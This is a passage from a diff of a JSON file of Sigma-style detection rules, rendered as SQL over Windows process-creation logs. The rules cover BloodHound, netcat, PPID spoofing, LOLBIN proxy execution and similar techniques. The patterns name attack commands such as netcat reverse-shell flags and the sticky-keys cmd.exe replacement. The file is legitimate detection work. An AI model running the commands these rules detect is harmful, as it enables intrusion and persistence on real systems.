Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": 
"e31033fc-33f0-4020-9a16-faf9b31cbf08", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate ncat use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR 
OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "status": "test", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 
'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1216" ], "falsepositives": [ - "Very Possible" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": 
"experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ 
- "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1216.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Msra.exe" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "status": "experimental", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ "attack.defense_evasion", 
@@ -13609,3213 +13446,3285 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "status": "experimental", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1218.011", + 